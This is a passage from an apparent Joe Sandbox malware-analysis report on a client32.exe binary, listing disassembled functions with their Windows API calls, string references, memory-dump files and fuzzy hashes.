Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF

Strings

%sNSA.LIC, xrefs: 1114651E
NSM.LIC, xrefs: 111464F3
%sNSM.LIC, xrefs: 11146508

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1

Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 110F4B8A
GetMessageA.USER32 ref: 110F4BAA
TranslateMessage.USER32(?), ref: 110F4BC4
DispatchMessageA.USER32(?), ref: 110F4BCA
CoUninitialize.OLE32 ref: 110F4BE6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchInitializeTranslateUninitialize
String ID:
API String ID: 3550192930-0
Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61

Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
CloseHandle.KERNEL32(00000000), ref: 11143EBF

Strings

", xrefs: 11143E4E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750

Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,B24479DC,756F13E0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA

Strings

DisableGeolocation, xrefs: 1102D85E
Client, xrefs: 1102D863

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: 8190095f3405e2018add7d5113c2964d74450cef64a1333a0ab8e65d50805e67
Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
Opcode Fuzzy Hash: 8190095f3405e2018add7d5113c2964d74450cef64a1333a0ab8e65d50805e67
Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88

Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32 ref: 1102783A

Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4

TranslateMessage.USER32(?), ref: 11027850
DispatchMessageA.USER32(?,?,?,?,?,?,?,?,1103081D), ref: 11027856

Strings

Exit Msgloop, quit=%d, xrefs: 1102788D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5

Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110179ED

Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 1101792C
Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0

Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 11017842
Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0

SetEvent.KERNEL32(00000188), ref: 11017A0D
GetTickCount.KERNEL32 ref: 11017A13

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1

Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
CloseHandle.KERNEL32(00000000), ref: 11138785

Strings

Client, xrefs: 1113875C
*AutoICFConfig, xrefs: 11138757

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: c7d02d57535ee59f71a844b0872d7ba7319e5239ed2d33223f252d9665e9b702
Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
Opcode Fuzzy Hash: c7d02d57535ee59f71a844b0872d7ba7319e5239ed2d33223f252d9665e9b702
Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755

Function 11135840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CreateThread.KERNEL32(00000000,00001000,11135700,00000000,00000000,1114239E), ref: 11135874
CloseHandle.KERNEL32(00000000), ref: 1113587B

Strings

_debug, xrefs: 11135853
UnresponsiveTime, xrefs: 1113584E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: UnresponsiveTime$_debug
API String ID: 3257255551-835906747
Opcode ID: b48175bd2c60be259dcddfaaaa70841d4dc92ba9f5b8bd986b36e28d93775853
Instruction ID: da03a37385785a02b027e482226a98526a2e13ea63ea6826a5b8101025715082
Opcode Fuzzy Hash: b48175bd2c60be259dcddfaaaa70841d4dc92ba9f5b8bd986b36e28d93775853
Instruction Fuzzy Hash: B2E0C239784318BBF66887E29E4AFB5FB1CE704B56F500158FB19A64C8DA917800C76A

Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 11070FE7
EnterCriticalSection.KERNEL32(?), ref: 11070FF4
LeaveCriticalSection.KERNEL32(?), ref: 110710C6

Strings

Push, xrefs: 11070FB6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90

Function 11110430 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
EnterCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
LeaveCriticalSection.KERNEL32(JN,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8

Strings

JN, xrefs: 1111045F, 11110474, 11110479, 111104C3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID: JN
API String ID: 3991485460-2143510404
Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0

Function 00AA1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00AA1027
GetStartupInfoA.KERNEL32 ref: 00AA107B
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00AA1096
ExitProcess.KERNEL32 ref: 00AA10A3

Memory Dump Source

Source File: 00000004.00000002.670583223.0000000000AA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000004.00000002.670578615.0000000000AA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aa0000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 0e52a0d73f2a01bec5dcb79b68fc8d47fd2d5b98bd90e71e6e9ca5430038e526
Instruction ID: 42d479722b7d3081852afd13192a0deec21de3a909c3541e8fc4e01d88a637b6
Opcode Fuzzy Hash: 0e52a0d73f2a01bec5dcb79b68fc8d47fd2d5b98bd90e71e6e9ca5430038e526
Instruction Fuzzy Hash: 051100244083C57AEB319FA488487EABFA59F03395F240048ECD7971C6D3524CC7C3A0

Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
CloseHandle.KERNEL32(?), ref: 11030DC9
FreeLibrary.KERNEL32(?), ref: 11030DD4
CloseHandle.KERNEL32(00000000), ref: 11030DDB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$FreeLibraryObjectSingleWait
String ID:
API String ID: 1314093303-0
Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40

Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\x225qa0\client32.exe,00000104,?,11144A43,?), ref: 11144819

Strings

C:\ProgramData\x225qa0\client32.exe, xrefs: 11144804, 11144812

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
